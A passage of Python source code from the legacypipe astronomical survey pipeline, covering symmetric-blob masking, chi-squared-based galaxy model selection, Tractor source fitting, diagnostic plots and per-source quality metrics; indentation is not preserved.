flipblobs = binary_fill_holes(flipblobs)
blobs,_ = label(flipblobs)
goodblob = blobs[iy,ix]
if self.plots_per_source and True:
# This plot is about the symmetric-blob definitions
# when fitting sources.
import pylab as plt
from legacypipe.detection import plot_boundary_map
plt.clf()
for i,(band,detmap,detiv) in enumerate(zip(self.bands, detmaps, detivs)):
if i >= 4:
break
detsn = detmap * np.sqrt(detiv)
plt.subplot(2,2, i+1)
mx = detsn.max()
dimshow(detsn, vmin=-2, vmax=max(8, mx))
ax = plt.axis()
plot_boundary_map(detsn >= 5.)
plt.plot(ix, iy, 'rx')
plt.plot([ix-flipw, ix-flipw, ix+flipw, ix+flipw, ix-flipw],
[iy-fliph, iy+fliph, iy+fliph, iy-fliph, iy-fliph], 'r-')
plt.axis(ax)
plt.title('det S/N: ' + band)
plt.subplot(2,2,4)
dimshow(flipblobs, vmin=0, vmax=1)
plt.colorbar()
ax = plt.axis()
plot_boundary_map(blobs == goodblob)
if binary_fill_holes(flipblobs)[iy,ix]:
fb = (blobs == goodblob)
di = binary_dilation(fb, iterations=4)
if np.any(di):
plot_boundary_map(di, rgb=(255,0,0))
plt.plot(ix, iy, 'rx')
plt.plot([ix-flipw, ix-flipw, ix+flipw, ix+flipw, ix-flipw],
[iy-fliph, iy+fliph, iy+fliph, iy-fliph, iy-fliph], 'r-')
plt.axis(ax)
plt.title('good blob')
self.ps.savefig()
plt.clf()
plt.subplot(2,2,1)
dimshow(blobs)
plt.colorbar()
plt.title('blob map; goodblob=%i' % goodblob)
plt.subplot(2,2,2)
dimshow(flipblobs, vmin=0, vmax=1)
plt.colorbar()
plt.title('symmetric blob mask: 1 = good; red=symm')
ax = plt.axis()
plt.plot(ix, iy, 'rx')
plt.plot([ix-flipw-0.5, ix-flipw-0.5, ix+flipw+0.5, ix+flipw+0.5, ix-flipw-0.5],
[iy-fliph-0.5, iy+fliph+0.5, iy+fliph+0.5, iy-fliph-0.5, iy-fliph-0.5], 'r-')
plt.axis(ax)
plt.subplot(2,2,3)
dh,dw = flipblobs.shape
sx0,sy0 = srcwcs_x0y0
dimshow(self.segmap[sy0:sy0+dh, sx0:sx0+dw])
plt.title('Segmentation map')
plt.subplot(2,2,4)
dilated = binary_dilation(flipblobs, iterations=4)
s = self.segmap[iy + sy0, ix + sx0]
if s != -1:
dilated *= (self.segmap[sy0:sy0+dh, sx0:sx0+dw] == s)
dimshow(dilated)
if s != -1:
plt.title('Dilated goodblob * Segmentation map')
else:
plt.title('Dilated goodblob (no Segmentation map)')
self.ps.savefig()
# If there is no longer a source detected at the original source
# position, we want to drop this source. However, saturation can
# cause there to be no detection S/N because of masking, so do
# a hole-fill before checking.
if not flipblobs[iy,ix]:
# The hole-fill can still fail (eg, in small test images) if
# the bleed trail splits the blob into two pieces.
# Skip this test for reference sources.
if is_reference_source(src):
debug('Reference source center is outside symmetric blob; keeping')
else:
debug('Source center is not in the symmetric blob mask; skipping')
return None
if goodblob != 0:
flipblobs = (blobs == goodblob)
dilated = binary_dilation(flipblobs, iterations=4)
if not np.any(dilated):
debug('No pixels in dilated symmetric mask')
return None
dh,dw = flipblobs.shape
sx0,sy0 = srcwcs_x0y0
s = self.segmap[iy + sy0, ix + sx0]
if s != -1:
dilated *= (self.segmap[sy0:sy0+dh, sx0:sx0+dw] == s)
if not np.any(dilated):
debug('No pixels in segmented dilated symmetric mask')
return None
yin = np.max(dilated, axis=1)
xin = np.max(dilated, axis=0)
yl,yh = np.flatnonzero(yin)[np.array([0,-1])]
xl,xh = np.flatnonzero(xin)[np.array([0,-1])]
(oldx0,oldy0) = srcwcs_x0y0
srcwcs = srcwcs.get_subimage(xl, yl, 1+xh-xl, 1+yh-yl)
srcwcs_x0y0 = (oldx0 + xl, oldy0 + yl)
srcblobmask = srcblobmask[yl:yh+1, xl:xh+1]
dilated = dilated[yl:yh+1, xl:xh+1]
flipblobs = flipblobs[yl:yh+1, xl:xh+1]
saved_srctim_ies = []
keep_srctims = []
mm = []
totalpix = 0
for tim in srctims:
# Zero out inverse-errors for all pixels outside
# 'dilated'.
try:
Yo,Xo,Yi,Xi,nil = resample_with_wcs(
tim.subwcs, srcwcs, intType=np.int16)
except OverlapError:
continue
ie = tim.getInvError()
newie = np.zeros_like(ie)
good, = np.nonzero(dilated[Yi,Xi] * (ie[Yo,Xo] > 0))
if len(good) == 0:
debug('Tim has inverr all == 0')
continue
yy = Yo[good]
xx = Xo[good]
newie[yy,xx] = ie[yy,xx]
xl,xh = xx.min(), xx.max()
yl,yh = yy.min(), yy.max()
totalpix += len(xx)
d = { src: ModelMask(xl, yl, 1+xh-xl, 1+yh-yl) }
mm.append(d)
saved_srctim_ies.append(ie)
tim.inverr = newie
keep_srctims.append(tim)
srctims = keep_srctims
modelMasks = mm
B.blob_symm_nimages[srci] = len(srctims)
B.blob_symm_npix[srci] = totalpix
sh,sw = srcwcs.shape
B.blob_symm_width [srci] = sw
B.blob_symm_height[srci] = sh
# if self.plots_per_source:
# from legacypipe.detection import plot_boundary_map
# plt.clf()
# dimshow(get_rgb(coimgs, self.bands))
# ax = plt.axis()
# plt.plot(x-1, y-1, 'r+')
# plt.axis(ax)
# sx0,sy0 = srcwcs_x0y0
# sh,sw = srcwcs.shape
# ext = [sx0, sx0+sw, sy0, sy0+sh]
# plot_boundary_map(flipblobs, rgb=(255,255,255), extent=ext)
# plot_boundary_map(dilated, rgb=(0,255,0), extent=ext)
# plt.title('symmetrized blobs')
# self.ps.savefig()
# nil,nil,coimgs,nil = quick_coadds(
# srctims, self.bands, self.blobwcs,
# fill_holes=False, get_cow=True)
# dimshow(get_rgb(coimgs, self.bands))
# ax = plt.axis()
# plt.plot(x-1, y-1, 'r+')
# plt.axis(ax)
# plt.title('Symmetric-blob masked')
# self.ps.savefig()
# plt.clf()
# for tim in srctims:
# ie = tim.getInvError()
# sigmas = (tim.getImage() * ie)[ie > 0]
# plt.hist(sigmas, range=(-5,5), bins=21, histtype='step')
# plt.axvline(np.mean(sigmas), alpha=0.5)
# plt.axvline(0., color='k', lw=3, alpha=0.5)
# plt.xlabel('Image pixels (sigma)')
# plt.title('Symmetrized pixel values')
# self.ps.savefig()
# # plot the modelmasks for each tim.
# plt.clf()
# R = int(np.floor(np.sqrt(len(srctims))))
# C = int(np.ceil(len(srctims) / float(R)))
# for i,tim in enumerate(srctims):
# plt.subplot(R, C, i+1)
# msk = modelMasks[i][src].mask
# print('Mask:', msk)
# if msk is None:
# continue
# plt.imshow(msk, interpolation='nearest', origin='lower', vmin=0, vmax=1)
# plt.title(tim.name)
# plt.suptitle('Model Masks')
# self.ps.savefig()
if self.bigblob and self.plots_per_source:
# This is a local source-WCS plot of the data going into the
# fit.
plt.clf()
coimgs,_ = quick_coadds(srctims, self.bands, srcwcs, fill_holes=False)
dimshow(get_rgb(coimgs, self.bands))
plt.title('Model selection: stage1 data (srcwcs)')
self.ps.savefig()
srctractor = self.tractor(srctims, [src])
srctractor.setModelMasks(modelMasks)
srccat = srctractor.getCatalog()
ok,ix,iy = srcwcs.radec2pixelxy(src.getPosition().ra,
src.getPosition().dec)
ix = int(ix-1)
iy = int(iy-1)
# Start in blob
sh,sw = srcwcs.shape
if ix < 0 or iy < 0 or ix >= sw or iy >= sh or not srcblobmask[iy,ix]:
debug('Source is starting outside blob -- skipping.')
if mask_others:
for ie,tim in zip(saved_srctim_ies, srctims):
tim.inverr = ie
return None
from tractor import Galaxy
is_galaxy = isinstance(src, Galaxy)
x0,y0 = srcwcs_x0y0
# Fitting behaviors based on geometric masks.
force_pointsource_mask = (IN_BLOB['BRIGHT'] | IN_BLOB['CLUSTER'])
# large_galaxies_force_pointsource is True by default.
if self.large_galaxies_force_pointsource:
force_pointsource_mask |= IN_BLOB['GALAXY']
force_pointsource = ((self.refmap[y0+iy,x0+ix] &
force_pointsource_mask) > 0)
fit_background_mask = IN_BLOB['BRIGHT']
if not self.less_masking:
fit_background_mask |= IN_BLOB['MEDIUM']
### HACK -- re-use this variable
if self.large_galaxies_force_pointsource:
fit_background_mask |= IN_BLOB['GALAXY']
fit_background = ((self.refmap[y0+iy,x0+ix] &
fit_background_mask) > 0)
if is_galaxy:
fit_background = False
# LSLGA galaxy: set the maximum allowed r_e.
known_galaxy_logrmax = 0.
if isinstance(src, (DevGalaxy,ExpGalaxy)):
print('Known galaxy. Initial shape:', src.shape)
# MAGIC 2. = factor by which r_e is allowed to grow for an LSLGA galaxy.
known_galaxy_logrmax = np.log(src.shape.re * 2.)
else:
print('WARNING: unknown galaxy type:', src)
debug('Source at blob coordinates', x0+ix, y0+iy, '- forcing pointsource?', force_pointsource, ', is large galaxy?', is_galaxy, ', fitting sky background:', fit_background)
if fit_background:
for tim in srctims:
tim.freezeAllBut('sky')
srctractor.thawParam('images')
skyparams = srctractor.images.getParams()
enable_galaxy_cache()
# Compute the log-likehood without a source here.
srccat[0] = None
if fit_background:
srctractor.optimize_loop(**self.optargs)
if self.plots_per_source:
model_mod_rgb = {}
model_resid_rgb = {}
# the "none" model
modimgs = list(srctractor.getModelImages())
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=modimgs)
rgb = get_rgb(co, self.bands)
model_mod_rgb['none'] = rgb
res = [(tim.getImage() - mod) for tim,mod in zip(srctims, modimgs)]
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=res)
rgb = get_rgb(co, self.bands)
model_resid_rgb['none'] = rgb
chisqs_none = _per_band_chisqs(srctractor, self.bands)
nparams = dict(psf=2, rex=3, exp=5, dev=5, ser=6)
# This is our "upgrade" threshold: how much better a galaxy
# fit has to be versus psf
galaxy_margin = 3.**2 + (nparams['exp'] - nparams['psf'])
# *chisqs* is actually chi-squared improvement vs no source;
# larger is a better fit.
chisqs = dict(none=0)
oldmodel, psf, rex, dev, exp = _initialize_models(src)
ser = None
trymodels = [('psf', psf)]
if oldmodel == 'psf':
if getattr(src, 'forced_point_source', False):
# This is set in the GaiaSource contructor from
# gaia.pointsource
debug('Gaia source is forced to be a point source -- not trying other models')
elif force_pointsource:
# Geometric mask
debug('Not computing galaxy models due to objects in blob')
else:
trymodels.append(('rex', rex))
# Try galaxy models if rex > psf, or if bright.
# The 'gals' model is just a marker
trymodels.append(('gals', None))
else:
# If the source was initialized as a galaxy, try all models
trymodels.extend([('rex', rex), ('dev', dev), ('exp', exp),
('ser', None)])
cputimes = {}
for name,newsrc in trymodels:
cpum0 = time.process_time()
if name == 'gals':
# If 'rex' was better than 'psf', or the source is
# bright, try the galaxy models.
chi_rex = chisqs.get('rex', 0)
chi_psf = chisqs.get('psf', 0)
margin = 1. # 1 parameter
if chi_rex > (chi_psf+margin) or max(chi_psf, chi_rex) > 400:
trymodels.extend([
('dev', dev), ('exp', exp), ('ser', None)])
continue
if name == 'ser' and newsrc is None:
# Start at the better of exp or dev.
smod = _select_model(chisqs, nparams, galaxy_margin)
if smod not in ['dev', 'exp']:
continue
if smod == 'dev':
newsrc = ser = SersicGalaxy(
dev.getPosition().copy(), dev.getBrightness().copy(),
dev.getShape().copy(), LegacySersicIndex(4.))
elif smod == 'exp':
newsrc = ser = SersicGalaxy(
exp.getPosition().copy(), exp.getBrightness().copy(),
exp.getShape().copy(), LegacySersicIndex(1.))
#print('Initialized SER model:', newsrc)
srccat[0] = newsrc
# Set maximum galaxy model sizes
if is_galaxy:
# This is a known large galaxy -- set max size based on initial size.
logrmax = known_galaxy_logrmax
if name in ('rex', 'exp', 'dev', 'ser'):
newsrc.shape.setMaxLogRadius(logrmax)
else:
# FIXME -- could use different fractions for deV vs exp (or comp)
fblob = 0.8
sh,sw = srcwcs.shape
logrmax = np.log(fblob * max(sh, sw) * self.pixscale)
if name in ['rex', 'exp', 'dev', 'ser']:
if logrmax < newsrc.shape.getMaxLogRadius():
newsrc.shape.setMaxLogRadius(logrmax)
# Use the same modelMask shapes as the original source ('src').
# Need to create newsrc->mask mappings though:
mm = remap_modelmask(modelMasks, src, newsrc)
srctractor.setModelMasks(mm)
enable_galaxy_cache()
if fit_background:
# Reset sky params
srctractor.images.setParams(skyparams)
srctractor.thawParam('images')
# First-round optimization (during model selection)
R = srctractor.optimize_loop(**self.optargs)
#print('Fit result:', newsrc)
#print('Steps:', R['steps'])
hit_limit = R.get('hit_limit', False)
opt_steps = R.get('steps', -1)
if hit_limit:
if name in ['rex', 'exp', 'dev', 'ser']:
debug('Hit limit: r %.2f vs %.2f' %
(newsrc.shape.re, np.exp(logrmax)))
ok,ix,iy = srcwcs.radec2pixelxy(newsrc.getPosition().ra,
newsrc.getPosition().dec)
ix = int(ix-1)
iy = int(iy-1)
sh,sw = srcblobmask.shape
if ix < 0 or iy < 0 or ix >= sw or iy >= sh or not srcblobmask[iy,ix]:
# Exited blob!
debug('Source exited sub-blob!')
if mask_others:
for ie,tim in zip(saved_srctim_ies, srctims):
tim.inverr = ie
continue
disable_galaxy_cache()
if self.plots_per_source:
# save RGB images for the model
modimgs = list(srctractor.getModelImages())
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=modimgs)
rgb = get_rgb(co, self.bands)
model_mod_rgb[name] = rgb
res = [(tim.getImage() - mod) for tim,mod in zip(srctims, modimgs)]
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=res)
rgb = get_rgb(co, self.bands)
model_resid_rgb[name] = rgb
# Compute inverse-variances for each source.
# Convert to "vanilla" ellipse parameterization
# (but save old shapes first)
# we do this (rather than making a copy) because we want to
# use the same modelMask maps.
if isinstance(newsrc, (DevGalaxy, ExpGalaxy, SersicGalaxy)):
oldshape = newsrc.shape
if fit_background:
# We have to freeze the sky here before computing
# uncertainties
srctractor.freezeParam('images')
nsrcparams = newsrc.numberOfParams()
_convert_ellipses(newsrc)
assert(newsrc.numberOfParams() == nsrcparams)
# Compute a very approximate "fracin" metric (fraction of flux in masked model image
# versus total flux of model), to avoid wild extrapolation when nearly unconstrained.
fracin = dict([(b, []) for b in self.bands])
fluxes = dict([(b, newsrc.getBrightness().getFlux(b)) for b in self.bands])
for tim,mod in zip(srctims, srctractor.getModelImages()):
f = (mod * (tim.getInvError() > 0)).sum() / fluxes[tim.band]
#print('Model image for', tim.name, ': has fracin = %.3g' % f)
fracin[tim.band].append(f)
for band in self.bands:
if len(fracin[band]) == 0:
continue
f = np.mean(fracin[band])
if f < 1e-6:
#print('Source', newsrc, ': setting flux in band', band,
# 'to zero based on fracin = %.3g' % f)
newsrc.getBrightness().setFlux(band, 0.)
# Compute inverse-variances
# This uses the second-round modelMasks.
allderivs = srctractor.getDerivs()
ivars = _compute_invvars(allderivs)
assert(len(ivars) == nsrcparams)
# If any fluxes have zero invvar, zero out the flux.
params = newsrc.getParams()
reset = False
for i,(pname,p,iv) in enumerate(zip(newsrc.getParamNames(), newsrc.getParams(), ivars)):
#print(' ', pname, '=', p, 'iv', iv, 'sigma', 1./np.sqrt(iv))
if iv == 0:
#print('Resetting', pname, '=', 0)
params[i] = 0.
reset = True
if reset:
newsrc.setParams(params)
allderivs = srctractor.getDerivs()
ivars = _compute_invvars(allderivs)
assert(len(ivars) == nsrcparams)
B.all_model_ivs[srci][name] = np.array(ivars).astype(np.float32)
B.all_models[srci][name] = newsrc.copy()
assert(B.all_models[srci][name].numberOfParams() == nsrcparams)
# Now revert the ellipses!
if isinstance(newsrc, (DevGalaxy, ExpGalaxy, SersicGalaxy)):
newsrc.shape = oldshape
# Use the original 'srctractor' here so that the different
# models are evaluated on the same pixels.
ch = _per_band_chisqs(srctractor, self.bands)
chisqs[name] = _chisq_improvement(newsrc, ch, chisqs_none)
cpum1 = time.process_time()
B.all_model_cpu[srci][name] = cpum1 - cpum0
cputimes[name] = cpum1 - cpum0
B.all_model_hit_limit[srci][name] = hit_limit
B.all_model_opt_steps[srci][name] = opt_steps
if mask_others:
for tim,ie in zip(srctims, saved_srctim_ies):
# revert tim to original (unmasked-by-others)
tim.inverr = ie
# After model selection, revert the sky
# (srctims=tims when not bigblob)
if fit_background:
srctractor.images.setParams(skyparams)
# Actually select which model to keep. This "modnames"
# array determines the order of the elements in the DCHISQ
# column of the catalog.
modnames = ['psf', 'rex', 'dev', 'exp', 'ser']
keepmod = _select_model(chisqs, nparams, galaxy_margin)
if keepmod is None and getattr(src, 'reference_star', False):
# Definitely keep ref stars (Gaia & Tycho)
print('Forcing keeping reference source:', psf)
keepmod = 'psf'
keepsrc = {'none':None, 'psf':psf, 'rex':rex,
'dev':dev, 'exp':exp, 'ser':ser}[keepmod]
bestchi = chisqs.get(keepmod, 0.)
B.dchisq[srci, :] = np.array([chisqs.get(k,0) for k in modnames])
#print('Keeping model', keepmod, '(chisqs: ', chisqs, ')')
if keepsrc is not None and bestchi == 0.:
# Weird edge case, or where some best-fit fluxes go
# negative. eg
# https://github.com/legacysurvey/legacypipe/issues/174
debug('Best dchisq is 0 -- dropping source')
keepsrc = None
B.hit_limit[srci] = B.all_model_hit_limit[srci].get(keepmod, False)
# This is the model-selection plot
if self.plots_per_source:
import pylab as plt
plt.clf()
rows,cols = 3, 6
modnames = ['none', 'psf', 'rex', 'dev', 'exp', 'ser']
# Top-left: image
plt.subplot(rows, cols, 1)
coimgs, cons = quick_coadds(srctims, self.bands, srcwcs)
rgb = get_rgb(coimgs, self.bands)
dimshow(rgb, ticks=False)
# next over: rgb with same stretch as models
plt.subplot(rows, cols, 2)
rgb = get_rgb(coimgs, self.bands)
dimshow(rgb, ticks=False)
for imod,modname in enumerate(modnames):
if modname != 'none' and not modname in chisqs:
continue
axes = []
# Second row: models
plt.subplot(rows, cols, 1+imod+1*cols)
rgb = model_mod_rgb[modname]
dimshow(rgb, ticks=False)
axes.append(plt.gca())
plt.title(modname)
# Third row: residuals (not chis)
plt.subplot(rows, cols, 1+imod+2*cols)
rgb = model_resid_rgb[modname]
dimshow(rgb, ticks=False)
axes.append(plt.gca())
plt.title('chisq %.0f' % chisqs[modname], fontsize=8)
# Highlight the model to be kept
if modname == keepmod:
for ax in axes:
for spine in ax.spines.values():
spine.set_edgecolor('red')
spine.set_linewidth(2)
plt.suptitle('Blob %s, src %i (psf: %s, fitbg: %s): keep %s\n%s\nwas: %s' %
(self.name, srci, force_pointsource, fit_background,
keepmod, str(keepsrc), str(src)), fontsize=10)
self.ps.savefig()
return keepsrc
def _optimize_individual_sources(self, tr, cat, Ibright, cputime):
# Single source (though this is coded to handle multiple sources)
# Fit sources one at a time, but don't subtract other models
cat.freezeAllParams()
models = SourceModels()
models.create(self.tims, cat)
enable_galaxy_cache()
for i in Ibright:
cpu0 = time.process_time()
cat.freezeAllBut(i)
src = cat[i]
if getattr(src, 'freezeparams', False):
debug('Frozen source', src, '-- keeping as-is!')
continue
modelMasks = models.model_masks(0, cat[i])
tr.setModelMasks(modelMasks)
tr.optimize_loop(**self.optargs)
cpu1 = time.process_time()
cputime[i] += (cpu1 - cpu0)
tr.setModelMasks(None)
disable_galaxy_cache()
def tractor(self, tims, cat):
tr = Tractor(tims, cat, **self.trargs)
tr.freezeParams('images')
return tr
def _optimize_individual_sources_subtract(self, cat, Ibright,
cputime):
# -Remember the original images
# -Compute initial models for each source (in each tim)
# -Subtract initial models from images
# -During fitting, for each source:
# -add back in the source's initial model (to each tim)
# -fit, with Catalog([src])
# -subtract final model (from each tim)
# -Replace original images
models = SourceModels()
# Remember original tim images
models.save_images(self.tims)
# Create & subtract initial models for each tim x each source
models.create(self.tims, cat, subtract=True)
# For sources, in decreasing order of brightness
for numi,srci in enumerate(Ibright):
cpu0 = time.process_time()
src = cat[srci]
if getattr(src, 'freezeparams', False):
debug('Frozen source', src, '-- keeping as-is!')
continue
debug('Fitting source', srci, '(%i of %i in blob %s)' %
(numi+1, len(Ibright), self.name), ':', src)
# Add this source's initial model back in.
models.add(srci, self.tims)
if self.bigblob:
# Create super-local sub-sub-tims around this source
# Make the subimages the same size as the modelMasks.
mods = [mod[srci] for mod in models.models]
srctims,modelMasks = _get_subimages(self.tims, mods, src)
# We plots only the first & last three sources
if self.plots_per_source and (numi < 3 or numi >= len(Ibright)-3):
import pylab as plt
plt.clf()
# Recompute coadds because of the subtract-all-and-readd shuffle
coimgs,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
fill_holes=False)
rgb = get_rgb(coimgs, self.bands)
dimshow(rgb)
ax = plt.axis()
for tim in srctims:
h,w = tim.shape
tx,ty = [0,0,w,w,0], [0,h,h,0,0]
rd = [tim.getWcs().pixelToPosition(xi,yi)
for xi,yi in zip(tx,ty)]
ra = [p.ra for p in rd]
dec = [p.dec for p in rd]
ok,x,y = self.blobwcs.radec2pixelxy(ra, dec)
plt.plot(x, y, 'b-')
ra,dec = tim.subwcs.pixelxy2radec(tx, ty)
ok,x,y = self.blobwcs.radec2pixelxy(ra, dec)
plt.plot(x, y, 'c-')
plt.title('source %i of %i' % (numi, len(Ibright)))
plt.axis(ax)
self.ps.savefig()
else:
srctims = self.tims
modelMasks = models.model_masks(srci, src)
srctractor = self.tractor(srctims, [src])
srctractor.setModelMasks(modelMasks)
# First-round optimization
#print('First-round initial log-prob:', srctractor.getLogProb())
srctractor.optimize_loop(**self.optargs)
#print('First-round final log-prob:', srctractor.getLogProb())
# Re-remove the final fit model for this source
models.update_and_subtract(srci, src, self.tims)
srctractor.setModelMasks(None)
disable_galaxy_cache()
#print('Fitting source took', Time()-tsrc)
#print(src)
cpu1 = time.process_time()
cputime[srci] += (cpu1 - cpu0)
models.restore_images(self.tims)
del models
def _fit_fluxes(self, cat, tims, bands):
cat.thawAllRecursive()
for src in cat:
src.freezeAllBut('brightness')
for b in bands:
for src in cat:
src.getBrightness().freezeAllBut(b)
# Images for this band
btims = [tim for tim in tims if tim.band == b]
btr = self.tractor(btims, cat)
btr.optimize_forced_photometry(shared_params=False, wantims=False)
cat.thawAllRecursive()
def _plots(self, tr, title):
plotmods = []
plotmodnames = []
plotmods.append(list(tr.getModelImages()))
plotmodnames.append(title)
for tim in tr.images:
if hasattr(tim, 'resamp'):
del tim.resamp
_plot_mods(tr.images, plotmods, self.blobwcs, plotmodnames, self.bands,
None, None, None,
self.blobw, self.blobh, self.ps, chi_plots=False)
for tim in tr.images:
if hasattr(tim, 'resamp'):
del tim.resamp
def _plot_coadd(self, tims, wcs, model=None, resid=None):
if resid is not None:
mods = list(resid.getChiImages())
coimgs,_ = quick_coadds(tims, self.bands, wcs, images=mods,
fill_holes=False)
dimshow(get_rgb(coimgs,self.bands, **rgbkwargs_resid))
return
mods = None
if model is not None:
mods = list(model.getModelImages())
coimgs,_ = quick_coadds(tims, self.bands, wcs, images=mods,
fill_holes=False)
dimshow(get_rgb(coimgs,self.bands))
def _initial_plots(self):
import pylab as plt
debug('Plotting blob image for blob', self.name)
coimgs,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
fill_holes=False)
self.rgb = get_rgb(coimgs, self.bands)
plt.clf()
dimshow(self.rgb)
plt.title('Blob: %s' % self.name)
self.ps.savefig()
if self.plots_single:
plt.figure(2)
dimshow(self.rgb, ticks=False)
plt.savefig('blob-%s-data.png' % (self.name))
plt.figure(1)
ok,x0,y0 = self.blobwcs.radec2pixelxy(
np.array([src.getPosition().ra for src in self.srcs]),
np.array([src.getPosition().dec for src in self.srcs]))
ax = plt.axis()
plt.plot(x0-1, y0-1, 'r.')
# ref sources
for x,y,src in zip(x0,y0,self.srcs):
if is_reference_source(src):
plt.plot(x-1, y-1, 'o', mec='g', mfc='none')
plt.axis(ax)
plt.title('initial sources')
self.ps.savefig()
def create_tims(self, timargs):
from legacypipe.bits import DQ_BITS
# In order to make multiprocessing easier, the one_blob method
# is passed all the ingredients to make local tractor Images
# rather than the Images themselves. Here we build the
# 'tims'.
tims = []
for (img, inverr, dq, twcs, wcsobj, pcal, sky, subpsf, name,
sx0, sx1, sy0, sy1, band, sig1, imobj) in timargs:
# Mask out inverr for pixels that are not within the blob.
try:
Yo,Xo,Yi,Xi,_ = resample_with_wcs(wcsobj, self.blobwcs,
intType=np.int16)
except OverlapError:
continue
if len(Yo) == 0:
continue
inverr2 = np.zeros_like(inverr)
I = np.flatnonzero(self.blobmask[Yi,Xi])
inverr2[Yo[I],Xo[I]] = inverr[Yo[I],Xo[I]]
inverr = inverr2
# If the subimage (blob) is small enough, instantiate a
# constant PSF model in the center.
h,w = img.shape
if h < 400 and w < 400:
subpsf = subpsf.constantPsfAt(w/2., h/2.)
tim = Image(data=img, inverr=inverr, wcs=twcs,
psf=subpsf, photocal=pcal, sky=sky, name=name)
tim.band = band
tim.sig1 = sig1
tim.subwcs = wcsobj
tim.meta = imobj
tim.psf_sigma = imobj.fwhm / 2.35
tim.dq = dq
tim.dq_saturation_bits = DQ_BITS['satur']
tims.append(tim)
return tims
def _convert_ellipses(src):
if isinstance(src, (DevGalaxy, ExpGalaxy, SersicGalaxy)):
src.shape = src.shape.toEllipseE()
if isinstance(src, RexGalaxy):
src.shape.freezeParams('e1', 'e2')
def _compute_invvars(allderivs):
ivs = []
for derivs in allderivs:
chisq = 0
for deriv,tim in derivs:
h,w = tim.shape
deriv.clipTo(w,h)
ie = tim.getInvError()
slc = deriv.getSlice(ie)
chi = deriv.patch * ie[slc]
chisq += (chi**2).sum()
ivs.append(chisq)
return ivs
def _argsort_by_brightness(cat, bands, ref_first=False):
fluxes = []
for src in cat:
# HACK -- here we just *sum* the nanomaggies in each band. Bogus!
br = src.getBrightness()
flux = sum([br.getFlux(band) for band in bands])
if ref_first and is_reference_source(src):
# Put the reference sources at the front of the list!
flux += 1e6
fluxes.append(flux)
Ibright = np.argsort(-np.array(fluxes))
return Ibright
def is_reference_source(src):
return getattr(src, 'is_reference_source', False)
def _compute_source_metrics(srcs, tims, bands, tr):
# rchi2 quality-of-fit metric
rchi2_num = np.zeros((len(srcs),len(bands)), np.float32)
rchi2_den = np.zeros((len(srcs),len(bands)), np.float32)
# fracflux degree-of-blending metric
fracflux_num = np.zeros((len(srcs),len(bands)), np.float32)
fracflux_den = np.zeros((len(srcs),len(bands)), np.float32)
# fracin flux-inside-blob metric
fracin_num = np.zeros((len(srcs),len(bands)), np.float32)
fracin_den = np.zeros((len(srcs),len(bands)), np.float32)
# fracmasked: fraction of masked pixels metric
fracmasked_num = np.zeros((len(srcs),len(bands)), np.float32)
fracmasked_den = np.zeros((len(srcs),len(bands)), np.float32)
for iband,band in enumerate(bands):
for tim in tims:
if tim.band != band:
continue
mod = np.zeros(tim.getModelShape(), tr.modtype)
srcmods = [None for src in srcs]
counts = np.zeros(len(srcs))
pcal = tim.getPhotoCal()
# For each source, compute its model and record its flux
# in this image. Also compute the full model *mod*.
for isrc,src in enumerate(srcs):
patch = tr.getModelPatch(tim, src)
if patch is None or patch.patch is None:
continue
counts[isrc] = np.sum([np.abs(pcal.brightnessToCounts(b))
for b in src.getBrightnesses()])
if counts[isrc] == 0:
continue
H,W = mod.shape
patch.clipTo(W,H)
srcmods[isrc] = patch
patch.addTo(mod)
# Now compute metrics for each source
for isrc,patch in enumerate(srcmods):
if patch is None:
continue
if patch.patch is None:
continue
if counts[isrc] == 0:
continue
if np.sum(patch.patch**2) == 0:
continue
slc = patch.getSlice(mod)
patch = patch.patch
# print('fracflux: band', band, 'isrc', isrc, 'tim', tim.name)
# print('src:', srcs[isrc])
# print('patch sum', np.sum(patch),'abs',np.sum(np.abs(patch)))
# print('counts:', counts[isrc])
# print('mod slice sum', np.sum(mod[slc]))
# print('mod[slc] - patch:', np.sum(mod[slc] - patch))
# (mod - patch) is flux from others
# (mod - patch) / counts is normalized flux from others
# We take that and weight it by this source's profile;
# patch / counts is unit profile
# But this takes the dot product between the profiles,
# so we have to normalize appropriately, ie by
# (patch**2)/counts**2; counts**2 drops out of the
# denom. If you have an identical source with twice the flux,
# this results in fracflux being 2.0
# fraction of this source's flux that is inside this patch.
# This can be < 1 when the source is near an edge, or if the
# source is a huge diffuse galaxy in a small patch.
fin = np.abs(np.sum(patch) / counts[isrc])
# print('fin:', fin)
# print('fracflux_num: fin *',
# np.sum((mod[slc] - patch) * np.abs(patch)) /
# np.sum(patch**2))
fracflux_num[isrc,iband] += (fin *
np.sum((mod[slc] - patch) * np.abs(patch)) /
np.sum(patch**2))
fracflux_den[isrc,iband] += fin
fracmasked_num[isrc,iband] += (
np.sum((tim.getInvError()[slc] == 0) * np.abs(patch)) /
np.abs(counts[isrc]))
fracmasked_den[isrc,iband] += fin
fracin_num[isrc,iband] += np.abs(np.sum(patch))
fracin_den[isrc,iband] += np.abs(counts[isrc])
tim.getSky().addTo(mod)
chisq = ((tim.getImage() - mod) * tim.getInvError())**2
for isrc,patch in enumerate(srcmods):
if patch is None or patch.patch is None:
continue
if counts[isrc] == 0:
continue
slc = patch.getSlice(mod)
# We compute numerator and denom separately to handle
# edge objects, where sum(patch.patch) < counts.
# Also, to normalize by the number of images. (Being
# on the edge of an image is like being in half an
# image.)
rchi2_num[isrc,iband] += (np.sum(chisq[slc] * patch.patch) /
counts[isrc])
# If the source is not near an image edge,
# sum(patch.patch) == counts[isrc].
rchi2_den[isrc,iband] += np.sum(patch.patch) / counts[isrc]
#print('Fracflux_num:', fracflux_num)
#print('Fracflux_den:', fracflux_den)
fracflux = fracflux_num / fracflux_den
rchi2 = rchi2_num / rchi2_den
fracmasked = fracmasked_num / fracmasked_den
# Eliminate NaNs (these happen when, eg, we have no coverage in one band but
# sources detected in another band, hence denominator is zero)
fracflux [ fracflux_den == 0] = 0.
rchi2 [ rchi2_den == 0] = 0.
fracmasked[fracmasked_den == 0] = 0.
# fracin_{num,den} are in flux * nimages units
tinyflux = 1e-9
fracin = fracin_num / np.maximum(tinyflux, fracin_den)
return dict(fracin=fracin, fracflux=fracflux, rchisq=rchi2,
fracmasked=fracmasked)
def _initialize_models(src):
from legacypipe.survey import LogRadius
if isinstance(src, PointSource):
psf = src.copy()
